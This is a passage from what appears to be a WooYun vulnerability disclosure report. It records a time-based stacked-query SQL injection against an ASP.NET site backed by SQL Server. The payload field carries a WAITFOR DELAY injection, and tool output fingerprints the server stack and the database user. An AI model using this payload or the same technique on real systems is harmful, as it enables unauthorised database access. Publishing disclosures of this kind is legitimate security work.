vZ3kvamwuYXNweD90eXBlPXJhZGlvCeaXoOe6v+eUtWQCBg9kFgJmDxUCJS9tZXRyb2xvZ3kvamwuYXNweD90eXBlPXRpbWVmcmVxdWVuY3kM5pe26Ze06aKR546HZAIHD2QWAmYPFQIhL21ldHJvbG9neS9qbC5hc3B4P3R5cGU9Y2hlbWlzdHJ5BuWMluWtpmQCFw8WAh8BAgkWEmYPZBYCZg8VAhcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9MQRDTkFTZAIBD2QWAmYPFQIXL2NlcnRzL2RldGFpbC5hc3B4P2lkPTQXQ0LnjrDlnLrmo4DmtYvlrp7pqozlrqRkAgIPZBYCZg8VAhcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9MgJVTGQCAw9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD0zA0ZDQ2QCBA9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD04FeWunumqjOWupOiupOWumuivgeS5pmQCBQ9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD03GOWbvemYsuiuoemHj+aKgOacr+acuuaehGQCBg9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD02EuWbveWutuiuoemHj+agh+WHhmQCBw9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD01EuS4k+mhueiuoemHj+aOiOadg2QCCA9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD05GENDQ+eOsOWcuuajgOa1i+WunumqjOWupGRkHDfoTvQuuot1oCciXV6gSyy904x2F0Ekeswaf8weXgk=
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ctl00$ContentPlaceHolder1$Button3=%e7%a1%ae%e5%ae%9a&ctl00$ContentPlaceHolder1$TextBox2=1&ctl00$ContentPlaceHolder1$TextBox3=1';WAITFOR DELAY '0:0:10'-- &ctl00$tb_name=mytixqnr&ctl00$tb_pass=g00dPa$$w0rD&ctl00$TextBox1=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAmAcZURQnYYovcfT798MKEvjgYQvlQv2oDArr6l/nSamxT+fwkSZ9Cp4Yd+cN6IkV+lBeHpy1zt3pnzJPIgYtaru3S8pWYO1BhvsosazapYPZ9UXI7RwI+ukRHnd+AlDZ6RcyJC/7Uhv8pUuTwRcnZKCNTGu6fpAlK5HiRhQ3QX7uQuDNsn18Vb/yPhT9ZPmVqhqsP+q5zC+TCAcrBnhAXnj3k8BhAWsprzUvtt1mNSPg==&__VIEWSTATE=/wEPDwULLTEyNDYxMzY3ODgPZBYCZg9kFgICAw9kFggCCw9kFgQCAQ8PFgIeBFRleHQFTuS4reW/g+aWsOWinuKAnOi9r+S7tua6kOS7o+eggeivhOa1i+ivlemqjOWupOKAne+8jOivmumCgOWuouaIt+i/m+ihjOivleeUqO+8gWRkAgUPFgIeC18hSXRlbUNvdW50AgkWEmYPZBYCZg8VBBcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9MSfkuK3lm73lkIjmoLzor4Tlrprlm73lrrborqTlj6/lp5TlkZjkvJocL3VwbG9hZHMvY2VydHMvbG9nby9jbmFzLnBuZyfkuK3lm73lkIjmoLzor4Tlrprlm73lrrborqTlj6/lp5TlkZjkvJpkAgEPZBYCZg8VBBcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9NBdDQueOsOWcuuajgOa1i+WunumqjOWupBovdXBsb2Fkcy9jZXJ0cy9sb2dvL2NiLnBuZxdDQueOsOWcuuajgOa1i+WunumqjOWupGQCAg9kFgJmDxUEFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD0yGOe+juWbveS/nemZqeWVhuWunumqjOWupBovdXBsb2Fkcy9jZXJ0cy9sb2dvL3VsLnBuZxjnvo7lm73kv53pmanllYblrp7pqozlrqRkAgMPZBYCZg8VBBcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9Mxvnvo7lm73ogZTpgqbpgJrorq/lp5TlkZjkvJobL3VwbG9hZHMvY2VydHMvbG9nby9mY2MuanBnG+e+juWbveiBlOmCpumAmuiur+WnlOWRmOS8mmQCBA9kFgJmDxUEFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD04FeWunumqjOWupOiupOWumuivgeS5phwvdXBsb2Fkcy9jZXJ0cy9sb2dvL2F0ZGMucG5nFeWunumqjOWupOiupOWumuivgeS5pmQCBQ9kFgJmDxUEFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD03GOWbvemYsuiuoemHj+aKgOacr+acuuaehB4vdXBsb2Fkcy9jZXJ0cy9sb2dvL+WbvemYsi5wbmcY5Zu96Ziy6K6h6YeP5oqA5pyv5py65p6EZAIGD2QWAmYPFQQXL2NlcnRzL2RldGFpbC5hc3B4P2lkPTYS5Zu95a626K6h6YeP5qCH5YeGJC91cGxvYWRzL2NlcnRzL2xvZ28v6K6h6YeP5qCH5YeGLnBuZxLlm73lrrborqHph4/moIflh4ZkAgcPZBYCZg8VBBcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9NRLkuJPpobnorqHph4/mjojmnYMkL3VwbG9hZHMvY2VydHMvbG9nby/kuJPpobnorqHph48ucG5nEuS4k+mhueiuoemHj+aOiOadg2QCCA9kFgJmDxUEFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD05GENDQ+eOsOWcuuajgOa1i+WunumqjOWupAAYQ0ND546w5Zy65qOA5rWL5a6e6aqM5a6kZAIPDxYCHwECBxYOZg9kFgJmDxUCHy9pbnNwZWN0aW9uL2pjLmFzcHg/dHlwZT1zYWZldHkM55S15Zmo5a6J5YWoZAIBD2QWAmYPFQIgL2luc3BlY3Rpb24vamMuYXNweD90eXBlPWFiaWxpdHkM55S15Zmo5oCn6IO9ZAICD2QWAmYPFQIcL2luc3BlY3Rpb24vamMuYXNweD90eXBlPWVtYwznlLXno4HlhbzlrrlkAgMPZBYCZg8VAiQvaW5zcGVjdGlvbi9qYy5hc3B4P3R5cGU9ZW52aXJvbm1lbnQY5Y+v6Z2g5oCn5LiO546v5aKD6K+V6aqMZAIED2QWAmYPFQIhL2luc3BlY3Rpb24vamMuYXNweD90eXBlPXdpcmVsZXNzEuaZuuiDveS6p+WTgea1i+ivhGQCBQ9kFgJmDxUCKS9pbnNwZWN0aW9uL2pjLmFzcHg/dHlwZT1waHlzaWNvY2hlbWlzdHJ5EueOr+S/neeQhuWMluWIhuaekGQCBg9kFgJmDxUCJS9pbnNwZWN0aW9uL2pjLmFzcHg/dHlwZT1hdXRoZW50aWNhdGUM5oqA5pyv5pyN5YqhZAITDxYCHwECCBYQZg9kFgJmDxUCHi9tZXRyb2xvZ3kvamwuYXNweD90eXBlPWxlbmd0aAnlh6DkvZXph49kAgEPZBYCZg8VAiIvbWV0cm9sb2d5L2psLmFzcHg/dHlwZT10aGVybW90aWNzBueDreWtpmQCAg9kFgJmDxUCHS9tZXRyb2xvZ3kvamwuYXNweD90eXBlPWZvcmNlBuWKm+WtpmQCAw9kFgJmDxUCHS9tZXRyb2xvZ3kvamwuYXNweD90eXBlPWxpZ2h0BuWFieWtpmQCBA9kFgJmDxUCIy9tZXRyb2xvZ3kvamwuYXNweD90eXBlPWVsZWN0cmljaXR5CeeUteejgeWtpmQCBQ9kFgJmDxUCHS9tZXRyb2xvZ3kvamwuYXNweD90eXBlPXJhZGlvCeaXoOe6v+eUtWQCBg9kFgJmDxUCJS9tZXRyb2xvZ3kvamwuYXNweD90eXBlPXRpbWVmcmVxdWVuY3kM5pe26Ze06aKR546HZAIHD2QWAmYPFQIhL21ldHJvbG9neS9qbC5hc3B4P3R5cGU9Y2hlbWlzdHJ5BuWMluWtpmQCFw8WAh8BAgkWEmYPZBYCZg8VAhcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9MQRDTkFTZAIBD2QWAmYPFQIXL2NlcnRzL2RldGFpbC5hc3B4P2lkPTQXQ0LnjrDlnLrmo4DmtYvlrp7pqozlrqRkAgIPZBYCZg8VAhcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9MgJVTGQCAw9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD0zA0ZDQ2QCBA9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD04FeWunumqjOWupOiupOWumuivgeS5pmQCBQ9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD03GOWbvemYsuiuoemHj+aKgOacr+acuuaehGQCBg9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD02EuWbveWutuiuoemHj+agh+WHhmQCBw9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD01EuS4k+mhueiuoemHj+aOiOadg2QCCA9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD05GENDQ+eOsOWcuuajgOa1i+WunumqjOWupGRkHDfoTvQuuot1oCciXV6gSyy904x2F0Ekeswaf8weXgk=
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
current user: 'user_tc'

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-28 12:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无